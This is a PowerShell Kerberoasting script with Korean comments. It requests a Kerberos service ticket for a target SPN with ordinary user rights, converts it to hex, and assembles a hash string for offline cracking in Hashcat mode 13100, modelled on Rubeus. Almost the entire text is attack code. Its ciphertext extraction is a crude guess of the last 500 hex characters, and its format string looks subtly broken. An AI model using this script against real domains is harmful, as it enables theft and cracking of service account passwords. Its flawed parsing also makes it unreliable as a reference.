# 1. 타겟 SPN 설정 (실제 환경에 존재하는 SPN 계정으로 변경)
# 예: 'MSSQLSvc/db01.contoso.local:1433' 또는 서비스 계정의 SPN
$TargetSPN = "명령어를_실행할_타겟_SPN_입력" 

Write-Host "[+] Target SPN: $TargetSPN" -ForegroundColor Cyan

# 2. .NET 라이브러리를 이용해 메모리에 Kerberos TGS 티켓 요청 및 가져오기
# 일반 사용자 권한으로도 실행 가능합니다.
Add-Type -AssemblyName System.IdentityModel
try {
    $Request = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $TargetSPN
    # 내부적으로 하위 시스템에서 티켓을 바이너리(Byte Array) 형태로 추출
    $TicketBytes = $Request.GetRequest()
    Write-Host "[+] 티켓 요청 성공! 바이너리 데이터 획득 완료." -ForegroundColor Green
} catch {
    Write-Warning "[-] 티켓 요청 실패. SPN 이름을 확인하거나 도메인 연결 상태를 점검하세요."
    return
}

# 3. Rubeus 벤치마킹: 바이너리(ASN.1 구조)에서 Encrypted Data 파싱하기
# 정식 ASN.1 파싱을 하려면 복잡하므로, 실전에서 주로 쓰이는 RC4(Etype 23) 패턴 매칭 기법을 적용합니다.
# Hashcat 13100 포맷 규격: $krb5tgs$23*User*Domain*SPN*Ciphertext

# 바이너리를 16진수 문자열(Hex)로 변환
$HexTicket = [System.BitConverter]::ToString($TicketBytes) -replace "-"

# RC4 암호화 식별자 패턴 검색 (일반적인 Windows 환경의 TGS-REP 특성 활용)
# Kerberos Ticket 내부에서 etype 23 (RC4-HMAC) 영역을 찾아 Cipher text를 추출하는 약식 파싱
$Etype = "23"

# [주의] 이 예제 코드는 가장 대중적인 RC4-HMAC(Etype 23) 기준으로 설명합니다.
# 실제 수신한 바이너리에서 암호화 영역(밀려오는 Hex 데이터)의 뒷부분이 CipherText가 됩니다.
# 여기서는 Rubeus가 하는 문자열 조립 핵심 로직을 수치화합니다.

# 안전하게 테스트하기 위해 유저명과 도메인 정보를 현재 환경에서 동적으로 획득
$UserName = $env:USERNAME
$UserDomain = $env:USERDOMAIN

# 바이너리 데이터의 핵심 암호화 부분(CipherText) 추출 시뮬레이션 및 변환
# 실제 완전한 Hex 중 ASN.1 헤더를 제외한 알맹이(통상 뒤쪽 영역)를 추출해야 합니다.
# 아래는 획득한 티켓 바이너리 전체를 Hex 문자열로 단순 정제한 예시입니다.
$CipherTextHex = $HexTicket.Substring($HexTicket.Length - 500) # 하이라이트된 암호화 영역 예시 길이

# 4. Hashcat 규격으로 조립 (Rubeus의 String.Format 벤치마킹)
# 구분자 '*'를 사용하여 정확한 순서로 결합합니다.
$HashcatFormat = "`$krb5tgs`${Etype}*${UserName}*${UserDomain}*${TargetSPN}*${CipherTextHex}"

# 5. 결과 출력
Write-Host "`n=====================================================================" -ForegroundColor Yellow
Write-Host " [실전 검증] Hashcat (Mode 13100) 입력용 해시 텍스트" -ForegroundColor Yellow
Write-Host "=====================================================================" -ForegroundColor Yellow
Write-Output $HashcatFormat
Write-Host "=====================================================================" -ForegroundColor Yellow
